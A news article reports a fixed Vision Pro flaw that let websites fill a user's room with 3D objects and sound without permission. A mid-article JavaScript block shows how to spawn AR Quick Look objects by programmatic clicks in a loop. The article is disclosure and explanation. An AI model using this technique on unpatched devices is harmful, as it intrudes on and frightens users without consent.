Apple has fixed a Vision Pro bug which would have allowed a website to fill your room with an unlimited number of virtual 3D objects. Those objects – flying bats in the proof of concept – would then persist even after you quit Safari.
The bug was discovered by a cybersecurity researcher who says Apple took a lot of care to protect against this type of exploit, but it forgot one thing …
Apple has protections against this
Ryan Pickren says that Apple has a specific protection against this in Vision Pro apps.
One of the big areas Apple is rightfully protective of is safeguarding who and what is allowed to enter your personal space inside Vision Pro. Wouldn’t it be awful if a malicious app could scare you by spawning items behind you? Well thankfully, by default, native apps are restricted to a “Shared Space” context, where they act predictably and can be easily closed.
If an app wants a more immersive experience, they must receive explicit permission from the user via an OS-level prompt that places them in a trusted “Full Space” context.
Websites can use experimental features to achieve the same thing, but Apple extended the Full Space model to apply to websites too.
But the company forgot one thing
But Apple forgot about an AR feature it developed back in 2018. It’s still there in WebKit today, and that includes the Vision Pro build.
There is an older web-based 3D model viewing standard that the visionOS team seemed to have forgotten about – Apple AR Kit Quick Look! Back in 2018, when Apple first started to dabble in AR/VR/XR, they developed a new HTML-based method in iOS for rendering 3D Pixar files called In-Place USDZ Viewing […]
After some quick testing, I noticed that this standard is still alive and well in WebKit (including the visionOS build), and even supports the more modern “.reality” filetype made by Apple’s Reality Composer. In fact, we can even add Spatial Audio so it feels like sound is coming from the object itself. Even better, these features work by default out-of-the-box, so the victim does not need to enable any fancy experimental features.
And here is the fun part – Safari does not enforce any type of permission model on this feature. Furthermore, it does not even require this anchor tag to have been “clicked” by the human. So programmatic JavaScript clicking (i.e. document.querySelector('a').click()) works no problem! This means that we can launch an arbitrary number of 3D, animated, sound-creating, objects without any user interaction whatsoever.
If the victim just views our website in Vision Pro, we can instantly fill their room with hundreds of crawling spiders and screeching bats! Freaky stuff.
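To make the mechanism concrete, here is an added example (written for this page, not Pickren's proof of concept or Apple's code) of what the no-user-gesture path looks like. It builds AR Quick Look anchors in the form Apple documents for in-place USDZ viewing, an `<a rel="ar">` whose first child is an `<img>`, and then fires `.click()` on each one in a loop. The model URL is a placeholder, and the stub `document` at the bottom is constructed so the logic can be exercised outside Safari; in a real page you would pass `document` itself. On visionOS builds that carry Apple's fix this no longer spawns objects without the permission flow.

```javascript
// Added example, not code from the original article or from Ryan Pickren.
// Assumptions: the model URL below is a placeholder (no such asset exists),
// and the anchor shape follows Apple's documented AR Quick Look markup.

const DEFAULT_MODEL_URL = "https://example.invalid/models/bats.usdz"; // placeholder

// AR Quick Look is triggered by an anchor with rel="ar" pointing at a .usdz or
// .reality file, with an <img> as its first child (the thumbnail).
function buildArQuickLookAnchor(doc, modelUrl) {
  if (!/\.(usdz|reality)$/i.test(modelUrl)) {
    throw new Error("AR Quick Look expects a .usdz or .reality model");
  }
  const a = doc.createElement("a");
  a.setAttribute("rel", "ar");
  a.setAttribute("href", modelUrl);
  const img = doc.createElement("img");
  img.setAttribute("src", "thumb.png"); // required child; its contents do not matter here
  a.appendChild(img);
  return a;
}

// Spawn `count` viewers with no human interaction: each programmatic .click()
// on a rel="ar" anchor launches the in-place viewer, and pre-fix visionOS Safari
// applied neither a permission prompt nor a user-gesture requirement to it.
function spawnModels(doc, count, modelUrl = DEFAULT_MODEL_URL) {
  const anchors = [];
  for (let i = 0; i < count; i++) {
    const a = buildArQuickLookAnchor(doc, modelUrl);
    doc.body.appendChild(a);
    a.click(); // no user gesture involved
    anchors.push(a);
  }
  return anchors;
}

// Minimal stand-in for `document` (constructed for this example) that records
// which elements were clicked, so the spawning logic can run outside a browser.
function makeStubDocument() {
  const clicks = [];
  function makeElement(tag) {
    const el = { tagName: tag.toUpperCase(), attrs: {}, children: [] };
    el.setAttribute = (k, v) => { el.attrs[k] = v; };
    el.getAttribute = (k) => el.attrs[k];
    el.appendChild = (c) => { el.children.push(c); return c; };
    el.click = () => { clicks.push(el); };
    return el;
  }
  const body = makeElement("body");
  return { body, clicks, createElement: makeElement };
}

// Usage in a browser would be: spawnModels(document, 100);
// Outside a browser, exercise the logic against the stub instead:
const stub = makeStubDocument();
spawnModels(stub, 3);
console.log(`anchors clicked without any user gesture: ${stub.clicks.length}`);
```

The point the stub makes visible is that nothing in the loop ever waits on an event from the user: the anchor is created, attached and clicked entirely from script, which is exactly why the number of spawned objects was bounded only by how many times the page chose to call `.click()`.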
All a user has to do is simply visit a website, and a couple of seconds later …
Now fixed
Apple paid Pickren an undisclosed, uh, bug bounty for identifying the vulnerability, and it’s now fixed.
Main image: Todd Cravens on Unsplash. Bats gif: Ryan Pickren.